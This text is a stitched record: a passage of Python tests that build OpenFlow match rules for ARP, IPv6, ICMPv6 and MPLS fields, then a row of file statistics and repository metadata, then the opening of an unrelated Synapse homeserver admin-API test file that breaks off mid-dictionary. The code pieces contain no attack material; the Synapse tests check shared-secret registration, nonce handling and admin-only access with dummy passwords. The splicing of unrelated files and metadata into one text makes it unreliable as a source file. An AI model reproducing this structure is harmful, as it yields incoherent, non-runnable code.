arp_sha_bin = self.haddr_to_bin(arp_sha)
self._verify = [(dp.ofproto.OXM_OF_ARP_SHA,
dp.ofproto.OXM_OF_ARP_SHA_W, ),
arp_sha_bin, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_arp_sha(arp_sha_bin)
self.add_matches(dp, match)
def test_rule_set_arp_sha_masked_ff(self, dp):
dl_type = ether.ETH_TYPE_ARP
arp_sha = '3e:ec:13:9b:f3:0b'
arp_sha_bin = self.haddr_to_bin(arp_sha)
mask = 'ff:ff:ff:ff:ff:ff'
mask_bin = self.haddr_to_bin(mask)
self._verify = [(dp.ofproto.OXM_OF_ARP_SHA,
dp.ofproto.OXM_OF_ARP_SHA_W, ),
arp_sha_bin, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_arp_sha_masked(arp_sha_bin, mask_bin)
self.add_matches(dp, match)
def test_rule_set_arp_sha_masked_f0(self, dp):
dl_type = ether.ETH_TYPE_ARP
arp_sha = '3e:ec:13:9b:f3:0b'
arp_sha_bin = self.haddr_to_bin(arp_sha)
mask = 'ff:ff:ff:ff:ff:00'
mask_bin = self.haddr_to_bin(mask)
self._verify = [(dp.ofproto.OXM_OF_ARP_SHA,
dp.ofproto.OXM_OF_ARP_SHA_W, ),
arp_sha_bin[:-1] + '\x00', mask_bin]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_arp_sha_masked(arp_sha_bin, mask_bin)
self.add_matches(dp, match)
def test_rule_set_arp_sha_masked_00(self, dp):
dl_type = ether.ETH_TYPE_ARP
arp_sha = '3e:ec:13:9b:f3:0b'
arp_sha_bin = self.haddr_to_bin(arp_sha)
mask = '00:00:00:00:00:00'
mask_bin = self.haddr_to_bin(mask)
self._verify = [(dp.ofproto.OXM_OF_ARP_SHA,
dp.ofproto.OXM_OF_ARP_SHA_W, ),
None, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_arp_sha_masked(arp_sha_bin, mask_bin)
self.add_matches(dp, match)
def test_rule_set_arp_tha(self, dp):
dl_type = ether.ETH_TYPE_ARP
arp_tha = '83:6c:21:52:49:68'
arp_tha_bin = self.haddr_to_bin(arp_tha)
self._verify = [(dp.ofproto.OXM_OF_ARP_THA,
dp.ofproto.OXM_OF_ARP_THA_W, ),
arp_tha_bin, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_arp_tha(arp_tha_bin)
self.add_matches(dp, match)
def test_rule_set_arp_tha_masked_ff(self, dp):
dl_type = ether.ETH_TYPE_ARP
arp_tha = '83:6c:21:52:49:68'
arp_tha_bin = self.haddr_to_bin(arp_tha)
mask = 'ff:ff:ff:ff:ff:ff'
mask_bin = self.haddr_to_bin(mask)
self._verify = [(dp.ofproto.OXM_OF_ARP_THA,
dp.ofproto.OXM_OF_ARP_THA_W, ),
arp_tha_bin, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_arp_tha_masked(arp_tha_bin, mask_bin)
self.add_matches(dp, match)
def test_rule_set_arp_tha_masked_f0(self, dp):
dl_type = ether.ETH_TYPE_ARP
arp_tha = '83:6c:21:52:49:68'
arp_tha_bin = self.haddr_to_bin(arp_tha)
mask = 'ff:ff:ff:ff:ff:00'
mask_bin = self.haddr_to_bin(mask)
self._verify = [(dp.ofproto.OXM_OF_ARP_THA,
dp.ofproto.OXM_OF_ARP_THA_W, ),
arp_tha_bin[:-1] + '\x00', mask_bin]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_arp_tha_masked(arp_tha_bin, mask_bin)
self.add_matches(dp, match)
def test_rule_set_arp_tha_masked_00(self, dp):
dl_type = ether.ETH_TYPE_ARP
arp_tha = '83:6c:21:52:49:68'
arp_tha_bin = self.haddr_to_bin(arp_tha)
mask = '00:00:00:00:00:00'
mask_bin = self.haddr_to_bin(mask)
self._verify = [(dp.ofproto.OXM_OF_ARP_THA,
dp.ofproto.OXM_OF_ARP_THA_W, ),
None, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_arp_tha_masked(arp_tha_bin, mask_bin)
self.add_matches(dp, match)
def test_rule_set_ipv6_src(self, dp):
dl_type = ether.ETH_TYPE_IPV6
ipv6_src = '2001:db8:bd05:1d2:288a:1fc0:1:10ee'
ipv6_src_int = self.ipv6_to_int(ipv6_src)
self._verify = [(dp.ofproto.OXM_OF_IPV6_SRC,
dp.ofproto.OXM_OF_IPV6_SRC_W, ),
ipv6_src_int, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ipv6_src(ipv6_src_int)
self.add_matches(dp, match)
def test_rule_set_ipv6_src_masked_ff(self, dp):
dl_type = ether.ETH_TYPE_IPV6
ipv6_src = '2001:db8:bd05:1d2:288a:1fc0:1:10ee'
ipv6_src_int = self.ipv6_to_int(ipv6_src)
mask = 'ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff'
mask_int = self.ipv6_to_int(mask)
self._verify = [(dp.ofproto.OXM_OF_IPV6_SRC,
dp.ofproto.OXM_OF_IPV6_SRC_W, ),
ipv6_src_int, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ipv6_src_masked(ipv6_src_int, mask_int)
self.add_matches(dp, match)
def test_rule_set_ipv6_src_masked_f0(self, dp):
dl_type = ether.ETH_TYPE_IPV6
ipv6_src = '2001:db8:bd05:1d2:288a:1fc0:1:10ee'
ipv6_src_int = self.ipv6_to_int(ipv6_src)
mask = 'ffff:ffff:ffff:ffff:ffff:ffff:ffff:0'
mask_int = self.ipv6_to_int(mask)
ipv6_src_masked = [x & y for (x, y) in
itertools.izip(ipv6_src_int, mask_int)]
self._verify = [(dp.ofproto.OXM_OF_IPV6_SRC,
dp.ofproto.OXM_OF_IPV6_SRC_W, ),
ipv6_src_masked, mask_int]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ipv6_src_masked(ipv6_src_int, mask_int)
self.add_matches(dp, match)
def test_rule_set_ipv6_src_masked_00(self, dp):
dl_type = ether.ETH_TYPE_IPV6
ipv6_src = '2001:db8:bd05:1d2:288a:1fc0:1:10ee'
ipv6_src_int = self.ipv6_to_int(ipv6_src)
mask = '0:0:0:0:0:0:0:0'
mask_int = self.ipv6_to_int(mask)
self._verify = [(dp.ofproto.OXM_OF_IPV6_SRC,
dp.ofproto.OXM_OF_IPV6_SRC_W, ),
None, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ipv6_src_masked(ipv6_src_int, mask_int)
self.add_matches(dp, match)
def test_rule_set_ipv6_dst(self, dp):
dl_type = ether.ETH_TYPE_IPV6
ipv6_dst = 'e9e8:9ea5:7d67:82cc:ca54:1fc0:2d24:f038'
ipv6_dst_int = self.ipv6_to_int(ipv6_dst)
self._verify = [(dp.ofproto.OXM_OF_IPV6_DST,
dp.ofproto.OXM_OF_IPV6_DST_W, ),
ipv6_dst_int, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ipv6_dst(ipv6_dst_int)
self.add_matches(dp, match)
def test_rule_set_ipv6_dst_masked_ff(self, dp):
dl_type = ether.ETH_TYPE_IPV6
ipv6_dst = 'e9e8:9ea5:7d67:82cc:ca54:1fc0:2d24:f038'
ipv6_dst_int = self.ipv6_to_int(ipv6_dst)
mask = 'ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff'
mask_int = self.ipv6_to_int(mask)
self._verify = [(dp.ofproto.OXM_OF_IPV6_DST,
dp.ofproto.OXM_OF_IPV6_DST_W, ),
ipv6_dst_int, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ipv6_dst_masked(ipv6_dst_int, mask_int)
self.add_matches(dp, match)
def test_rule_set_ipv6_dst_masked_f0(self, dp):
dl_type = ether.ETH_TYPE_IPV6
ipv6_dst = 'e9e8:9ea5:7d67:82cc:ca54:1fc0:2d24:f038'
ipv6_dst_int = self.ipv6_to_int(ipv6_dst)
mask = 'ffff:ffff:ffff:ffff:ffff:ffff:ffff:0'
mask_int = self.ipv6_to_int(mask)
ipv6_dst_masked = [x & y for (x, y) in
itertools.izip(ipv6_dst_int, mask_int)]
self._verify = [(dp.ofproto.OXM_OF_IPV6_DST,
dp.ofproto.OXM_OF_IPV6_DST_W, ),
ipv6_dst_masked, mask_int]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ipv6_dst_masked(ipv6_dst_int, mask_int)
self.add_matches(dp, match)
def test_rule_set_ipv6_dst_masked_00(self, dp):
dl_type = ether.ETH_TYPE_IPV6
ipv6_dst = 'e9e8:9ea5:7d67:82cc:ca54:1fc0:2d24:f038'
ipv6_dst_int = self.ipv6_to_int(ipv6_dst)
mask = '0:0:0:0:0:0:0:0'
mask_int = self.ipv6_to_int(mask)
self._verify = [(dp.ofproto.OXM_OF_IPV6_DST,
dp.ofproto.OXM_OF_IPV6_DST_W, ),
None, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ipv6_dst_masked(ipv6_dst_int, mask_int)
self.add_matches(dp, match)
def test_rule_set_ipv6_flabel(self, dp):
dl_type = ether.ETH_TYPE_IPV6
ipv6_label = 0xc5384
self._verify = [(dp.ofproto.OXM_OF_IPV6_FLABEL,
dp.ofproto.OXM_OF_IPV6_FLABEL_W, ),
ipv6_label, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ipv6_flabel(ipv6_label)
self.add_matches(dp, match)
def test_rule_set_ipv6_flabel_masked_ff(self, dp):
dl_type = ether.ETH_TYPE_IPV6
ipv6_label = 0xc5384
mask = 0xfffff
self._verify = [(dp.ofproto.OXM_OF_IPV6_FLABEL,
dp.ofproto.OXM_OF_IPV6_FLABEL_W, ),
ipv6_label, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ipv6_flabel_masked(ipv6_label, mask)
self.add_matches(dp, match)
def test_rule_set_ipv6_flabel_masked_f0(self, dp):
dl_type = ether.ETH_TYPE_IPV6
ipv6_label = 0xc5384
mask = 0xffff0
self._verify = [(dp.ofproto.OXM_OF_IPV6_FLABEL,
dp.ofproto.OXM_OF_IPV6_FLABEL_W, ),
ipv6_label & mask, mask]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ipv6_flabel_masked(ipv6_label, mask)
self.add_matches(dp, match)
def test_rule_set_ipv6_flabel_masked_00(self, dp):
dl_type = ether.ETH_TYPE_IPV6
ipv6_label = 0xc5384
mask = 0x0
self._verify = [(dp.ofproto.OXM_OF_IPV6_FLABEL,
dp.ofproto.OXM_OF_IPV6_FLABEL_W, ),
None, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ipv6_flabel_masked(ipv6_label, mask)
self.add_matches(dp, match)
def test_rule_set_icmpv6_type(self, dp):
dl_type = ether.ETH_TYPE_IPV6
ip_proto = inet.IPPROTO_ICMPV6
icmp_type = 129
self._verify = [(dp.ofproto.OXM_OF_ICMPV6_TYPE, ),
icmp_type, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ip_proto(ip_proto)
match.set_icmpv6_type(icmp_type)
self.add_matches(dp, match)
def test_rule_set_icmpv6_code(self, dp):
dl_type = ether.ETH_TYPE_IPV6
ip_proto = inet.IPPROTO_ICMPV6
icmp_type = 138
icmp_code = 1
self._verify = [(dp.ofproto.OXM_OF_ICMPV6_CODE, ),
icmp_code, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ip_proto(ip_proto)
match.set_icmpv6_type(icmp_type)
match.set_icmpv6_code(icmp_code)
self.add_matches(dp, match)
def test_rule_set_ipv6_nd_target(self, dp):
dl_type = ether.ETH_TYPE_IPV6
ip_proto = inet.IPPROTO_ICMPV6
icmp_type = 135
target = "5420:db3f:921b:3e33:2791:98f:dd7f:2e19"
target_int = self.ipv6_to_int(target)
self._verify = [(dp.ofproto.OXM_OF_IPV6_ND_TARGET, ),
target_int, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ip_proto(ip_proto)
match.set_icmpv6_type(icmp_type)
match.set_ipv6_nd_target(target_int)
self.add_matches(dp, match)
def test_rule_set_ipv6_nd_sll(self, dp):
dl_type = ether.ETH_TYPE_IPV6
ip_proto = inet.IPPROTO_ICMPV6
icmp_type = 135
nd_sll = "93:6d:d0:d4:e8:36"
nd_sll_bin = self.haddr_to_bin(nd_sll)
self._verify = [(dp.ofproto.OXM_OF_IPV6_ND_SLL, ),
nd_sll_bin, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ip_proto(ip_proto)
match.set_icmpv6_type(icmp_type)
match.set_ipv6_nd_sll(nd_sll_bin)
self.add_matches(dp, match)
def test_rule_set_ipv6_nd_tll(self, dp):
dl_type = ether.ETH_TYPE_IPV6
ip_proto = inet.IPPROTO_ICMPV6
icmp_type = 136
nd_tll = "18:f6:66:b6:f1:b3"
nd_tll_bin = self.haddr_to_bin(nd_tll)
self._verify = [(dp.ofproto.OXM_OF_IPV6_ND_TLL, ),
nd_tll_bin, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_ip_proto(ip_proto)
match.set_icmpv6_type(icmp_type)
match.set_ipv6_nd_tll(nd_tll_bin)
self.add_matches(dp, match)
def test_rule_set_mpls_label(self, dp):
dl_type = 0x8847
label = 2144
self._verify = [(dp.ofproto.OXM_OF_MPLS_LABEL, ),
label, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_mpls_label(label)
self.add_matches(dp, match)
def test_rule_set_mpls_tc(self, dp):
dl_type = 0x8847
tc = 3
self._verify = [(dp.ofproto.OXM_OF_MPLS_TC, ),
tc, None]
match = dp.ofproto_parser.OFPMatch()
match.set_dl_type(dl_type)
match.set_mpls_tc(tc)
self.add_matches(dp, match)
| 35.776664 | 69 | 0.602619 | 5,795 | 39,247 | 3.674029 | 0.050043 | 0.087502 | 0.071016 | 0.082852 | 0.914377 | 0.907754 | 0.899253 | 0.879574 | 0.871354 | 0.867878 | 0 | 0.040049 | 0.299539 | 39,247 | 1,096 | 70 | 35.809307 | 0.734422 | 0.016969 | 0 | 0.757206 | 0 | 0 | 0.038693 | 0.012448 | 0 | 0 | 0.003034 | 0 | 0 | 1 | 0.0898 | false | 0 | 0.006652 | 0 | 0.103104 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
54d46f4bd3dbfc8779a65fe82e1086dee110a8c9 | 69,968 | py | Python | tests/rest/admin/test_user.py | sandhose/synapse | 3e8292d48324d329c188d0125cdec4020ddc39ff | [
"Apache-2.0"
] | 1 | 2021-12-31T23:33:48.000Z | 2021-12-31T23:33:48.000Z | tests/rest/admin/test_user.py | sandhose/synapse | 3e8292d48324d329c188d0125cdec4020ddc39ff | [
"Apache-2.0"
] | null | null | null | tests/rest/admin/test_user.py | sandhose/synapse | 3e8292d48324d329c188d0125cdec4020ddc39ff | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2018 New Vector Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import hashlib
import hmac
import json
import urllib.parse
from binascii import unhexlify
from mock import Mock
import synapse.rest.admin
from synapse.api.constants import UserTypes
from synapse.api.errors import Codes, HttpResponseException, ResourceLimitError
from synapse.rest.client.v1 import login, logout, profile, room
from synapse.rest.client.v2_alpha import devices, sync
from tests import unittest
from tests.test_utils import make_awaitable
from tests.unittest import override_config
class UserRegisterTestCase(unittest.HomeserverTestCase):
servlets = [
synapse.rest.admin.register_servlets_for_client_rest_resource,
profile.register_servlets,
]
def make_homeserver(self, reactor, clock):
self.url = "/_synapse/admin/v1/register"
self.registration_handler = Mock()
self.identity_handler = Mock()
self.login_handler = Mock()
self.device_handler = Mock()
self.device_handler.check_device_registered = Mock(return_value="FAKE")
self.datastore = Mock(return_value=Mock())
self.datastore.get_current_state_deltas = Mock(return_value=(0, []))
self.secrets = Mock()
self.hs = self.setup_test_homeserver()
self.hs.config.registration_shared_secret = "shared"
self.hs.get_media_repository = Mock()
self.hs.get_deactivate_account_handler = Mock()
return self.hs
def test_disabled(self):
"""
If there is no shared secret, registration through this method will be
prevented.
"""
self.hs.config.registration_shared_secret = None
request, channel = self.make_request("POST", self.url, b"{}")
self.assertEqual(400, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual(
"Shared secret registration is not enabled", channel.json_body["error"]
)
def test_get_nonce(self):
"""
Calling GET on the endpoint will return a randomised nonce, using the
homeserver's secrets provider.
"""
secrets = Mock()
secrets.token_hex = Mock(return_value="abcd")
self.hs.get_secrets = Mock(return_value=secrets)
request, channel = self.make_request("GET", self.url)
self.assertEqual(channel.json_body, {"nonce": "abcd"})
def test_expired_nonce(self):
"""
Calling GET on the endpoint will return a randomised nonce, which will
only last for SALT_TIMEOUT (60s).
"""
request, channel = self.make_request("GET", self.url)
nonce = channel.json_body["nonce"]
# 59 seconds
self.reactor.advance(59)
body = json.dumps({"nonce": nonce})
request, channel = self.make_request("POST", self.url, body.encode("utf8"))
self.assertEqual(400, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("username must be specified", channel.json_body["error"])
# 61 seconds
self.reactor.advance(2)
request, channel = self.make_request("POST", self.url, body.encode("utf8"))
self.assertEqual(400, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("unrecognised nonce", channel.json_body["error"])
def test_register_incorrect_nonce(self):
"""
Only the provided nonce can be used, as it's checked in the MAC.
"""
request, channel = self.make_request("GET", self.url)
nonce = channel.json_body["nonce"]
want_mac = hmac.new(key=b"shared", digestmod=hashlib.sha1)
want_mac.update(b"notthenonce\x00bob\x00abc123\x00admin")
want_mac = want_mac.hexdigest()
body = json.dumps(
{
"nonce": nonce,
"username": "bob",
"password": "abc123",
"admin": True,
"mac": want_mac,
}
)
request, channel = self.make_request("POST", self.url, body.encode("utf8"))
self.assertEqual(403, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("HMAC incorrect", channel.json_body["error"])
def test_register_correct_nonce(self):
"""
When the correct nonce is provided, and the right key is provided, the
user is registered.
"""
request, channel = self.make_request("GET", self.url)
nonce = channel.json_body["nonce"]
want_mac = hmac.new(key=b"shared", digestmod=hashlib.sha1)
want_mac.update(
nonce.encode("ascii") + b"\x00bob\x00abc123\x00admin\x00support"
)
want_mac = want_mac.hexdigest()
body = json.dumps(
{
"nonce": nonce,
"username": "bob",
"password": "abc123",
"admin": True,
"user_type": UserTypes.SUPPORT,
"mac": want_mac,
}
)
request, channel = self.make_request("POST", self.url, body.encode("utf8"))
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("@bob:test", channel.json_body["user_id"])
def test_nonce_reuse(self):
"""
A valid unrecognised nonce.
"""
request, channel = self.make_request("GET", self.url)
nonce = channel.json_body["nonce"]
want_mac = hmac.new(key=b"shared", digestmod=hashlib.sha1)
want_mac.update(nonce.encode("ascii") + b"\x00bob\x00abc123\x00admin")
want_mac = want_mac.hexdigest()
body = json.dumps(
{
"nonce": nonce,
"username": "bob",
"password": "abc123",
"admin": True,
"mac": want_mac,
}
)
request, channel = self.make_request("POST", self.url, body.encode("utf8"))
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("@bob:test", channel.json_body["user_id"])
# Now, try and reuse it
request, channel = self.make_request("POST", self.url, body.encode("utf8"))
self.assertEqual(400, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("unrecognised nonce", channel.json_body["error"])
def test_missing_parts(self):
"""
Synapse will complain if you don't give nonce, username, password, and
mac. Admin and user_types are optional. Additional checks are done for length
and type.
"""
def nonce():
request, channel = self.make_request("GET", self.url)
return channel.json_body["nonce"]
#
# Nonce check
#
# Must be present
body = json.dumps({})
request, channel = self.make_request("POST", self.url, body.encode("utf8"))
self.assertEqual(400, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("nonce must be specified", channel.json_body["error"])
#
# Username checks
#
# Must be present
body = json.dumps({"nonce": nonce()})
request, channel = self.make_request("POST", self.url, body.encode("utf8"))
self.assertEqual(400, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("username must be specified", channel.json_body["error"])
# Must be a string
body = json.dumps({"nonce": nonce(), "username": 1234})
request, channel = self.make_request("POST", self.url, body.encode("utf8"))
self.assertEqual(400, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("Invalid username", channel.json_body["error"])
# Must not have null bytes
body = json.dumps({"nonce": nonce(), "username": "abcd\u0000"})
request, channel = self.make_request("POST", self.url, body.encode("utf8"))
self.assertEqual(400, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("Invalid username", channel.json_body["error"])
# Must not have null bytes
body = json.dumps({"nonce": nonce(), "username": "a" * 1000})
request, channel = self.make_request("POST", self.url, body.encode("utf8"))
self.assertEqual(400, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("Invalid username", channel.json_body["error"])
#
# Password checks
#
# Must be present
body = json.dumps({"nonce": nonce(), "username": "a"})
request, channel = self.make_request("POST", self.url, body.encode("utf8"))
self.assertEqual(400, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("password must be specified", channel.json_body["error"])
# Must be a string
body = json.dumps({"nonce": nonce(), "username": "a", "password": 1234})
request, channel = self.make_request("POST", self.url, body.encode("utf8"))
self.assertEqual(400, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("Invalid password", channel.json_body["error"])
# Must not have null bytes
body = json.dumps({"nonce": nonce(), "username": "a", "password": "abcd\u0000"})
request, channel = self.make_request("POST", self.url, body.encode("utf8"))
self.assertEqual(400, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("Invalid password", channel.json_body["error"])
# Super long
body = json.dumps({"nonce": nonce(), "username": "a", "password": "A" * 1000})
request, channel = self.make_request("POST", self.url, body.encode("utf8"))
self.assertEqual(400, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("Invalid password", channel.json_body["error"])
#
# user_type check
#
# Invalid user_type
body = json.dumps(
{
"nonce": nonce(),
"username": "a",
"password": "1234",
"user_type": "invalid",
}
)
request, channel = self.make_request("POST", self.url, body.encode("utf8"))
self.assertEqual(400, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("Invalid user type", channel.json_body["error"])
def test_displayname(self):
"""
Test that displayname of new user is set
"""
# set no displayname
request, channel = self.make_request("GET", self.url)
nonce = channel.json_body["nonce"]
want_mac = hmac.new(key=b"shared", digestmod=hashlib.sha1)
want_mac.update(nonce.encode("ascii") + b"\x00bob1\x00abc123\x00notadmin")
want_mac = want_mac.hexdigest()
body = json.dumps(
{"nonce": nonce, "username": "bob1", "password": "abc123", "mac": want_mac}
)
request, channel = self.make_request("POST", self.url, body.encode("utf8"))
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("@bob1:test", channel.json_body["user_id"])
request, channel = self.make_request("GET", "/profile/@bob1:test/displayname")
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("bob1", channel.json_body["displayname"])
# displayname is None
request, channel = self.make_request("GET", self.url)
nonce = channel.json_body["nonce"]
want_mac = hmac.new(key=b"shared", digestmod=hashlib.sha1)
want_mac.update(nonce.encode("ascii") + b"\x00bob2\x00abc123\x00notadmin")
want_mac = want_mac.hexdigest()
body = json.dumps(
{
"nonce": nonce,
"username": "bob2",
"displayname": None,
"password": "abc123",
"mac": want_mac,
}
)
request, channel = self.make_request("POST", self.url, body.encode("utf8"))
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("@bob2:test", channel.json_body["user_id"])
request, channel = self.make_request("GET", "/profile/@bob2:test/displayname")
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("bob2", channel.json_body["displayname"])
# displayname is empty
request, channel = self.make_request("GET", self.url)
nonce = channel.json_body["nonce"]
want_mac = hmac.new(key=b"shared", digestmod=hashlib.sha1)
want_mac.update(nonce.encode("ascii") + b"\x00bob3\x00abc123\x00notadmin")
want_mac = want_mac.hexdigest()
body = json.dumps(
{
"nonce": nonce,
"username": "bob3",
"displayname": "",
"password": "abc123",
"mac": want_mac,
}
)
request, channel = self.make_request("POST", self.url, body.encode("utf8"))
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("@bob3:test", channel.json_body["user_id"])
request, channel = self.make_request("GET", "/profile/@bob3:test/displayname")
self.assertEqual(404, int(channel.result["code"]), msg=channel.result["body"])
# set displayname
request, channel = self.make_request("GET", self.url)
nonce = channel.json_body["nonce"]
want_mac = hmac.new(key=b"shared", digestmod=hashlib.sha1)
want_mac.update(nonce.encode("ascii") + b"\x00bob4\x00abc123\x00notadmin")
want_mac = want_mac.hexdigest()
body = json.dumps(
{
"nonce": nonce,
"username": "bob4",
"displayname": "Bob's Name",
"password": "abc123",
"mac": want_mac,
}
)
request, channel = self.make_request("POST", self.url, body.encode("utf8"))
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("@bob4:test", channel.json_body["user_id"])
request, channel = self.make_request("GET", "/profile/@bob4:test/displayname")
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("Bob's Name", channel.json_body["displayname"])
@override_config(
{"limit_usage_by_mau": True, "max_mau_value": 2, "mau_trial_days": 0}
)
def test_register_mau_limit_reached(self):
"""
Check we can register a user via the shared secret registration API
even if the MAU limit is reached.
"""
handler = self.hs.get_registration_handler()
store = self.hs.get_datastore()
# Set monthly active users to the limit
store.get_monthly_active_count = Mock(
return_value=make_awaitable(self.hs.config.max_mau_value)
)
# Check that the blocking of monthly active users is working as expected
# The registration of a new user fails due to the limit
self.get_failure(
handler.register_user(localpart="local_part"), ResourceLimitError
)
# Register new user with admin API
request, channel = self.make_request("GET", self.url)
nonce = channel.json_body["nonce"]
want_mac = hmac.new(key=b"shared", digestmod=hashlib.sha1)
want_mac.update(
nonce.encode("ascii") + b"\x00bob\x00abc123\x00admin\x00support"
)
want_mac = want_mac.hexdigest()
body = json.dumps(
{
"nonce": nonce,
"username": "bob",
"password": "abc123",
"admin": True,
"user_type": UserTypes.SUPPORT,
"mac": want_mac,
}
)
request, channel = self.make_request("POST", self.url, body.encode("utf8"))
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("@bob:test", channel.json_body["user_id"])
class UsersListTestCase(unittest.HomeserverTestCase):
servlets = [
synapse.rest.admin.register_servlets,
login.register_servlets,
]
url = "/_synapse/admin/v2/users"
def prepare(self, reactor, clock, hs):
self.admin_user = self.register_user("admin", "pass", admin=True)
self.admin_user_tok = self.login("admin", "pass")
self.register_user("user1", "pass1", admin=False)
self.register_user("user2", "pass2", admin=False)
def test_no_auth(self):
"""
Try to list users without authentication.
"""
request, channel = self.make_request("GET", self.url, b"{}")
self.assertEqual(401, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("M_MISSING_TOKEN", channel.json_body["errcode"])
def test_all_users(self):
"""
List all users, including deactivated users.
"""
request, channel = self.make_request(
"GET",
self.url + "?deactivated=true",
b"{}",
access_token=self.admin_user_tok,
)
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual(3, len(channel.json_body["users"]))
self.assertEqual(3, channel.json_body["total"])
class UserRestTestCase(unittest.HomeserverTestCase):
servlets = [
synapse.rest.admin.register_servlets,
login.register_servlets,
sync.register_servlets,
]
def prepare(self, reactor, clock, hs):
self.store = hs.get_datastore()
self.admin_user = self.register_user("admin", "pass", admin=True)
self.admin_user_tok = self.login("admin", "pass")
self.other_user = self.register_user("user", "pass")
self.other_user_token = self.login("user", "pass")
self.url_other_user = "/_synapse/admin/v2/users/%s" % urllib.parse.quote(
self.other_user
)
def test_requester_is_no_admin(self):
"""
If the user is not a server admin, an error is returned.
"""
url = "/_synapse/admin/v2/users/@bob:test"
request, channel = self.make_request(
"GET", url, access_token=self.other_user_token,
)
self.assertEqual(403, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("You are not a server admin", channel.json_body["error"])
request, channel = self.make_request(
"PUT", url, access_token=self.other_user_token, content=b"{}",
)
self.assertEqual(403, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("You are not a server admin", channel.json_body["error"])
def test_user_does_not_exist(self):
"""
Tests that a lookup for a user that does not exist returns a 404
"""
request, channel = self.make_request(
"GET",
"/_synapse/admin/v2/users/@unknown_person:test",
access_token=self.admin_user_tok,
)
self.assertEqual(404, channel.code, msg=channel.json_body)
self.assertEqual("M_NOT_FOUND", channel.json_body["errcode"])
def test_create_server_admin(self):
"""
Check that a new admin user is created successfully.
"""
url = "/_synapse/admin/v2/users/@bob:test"
# Create user (server admin)
body = json.dumps(
{
"password": "abc123",
"admin": True,
"displayname": "Bob's name",
"threepids": [{"medium": "email", "address": "bob@bob.bob"}],
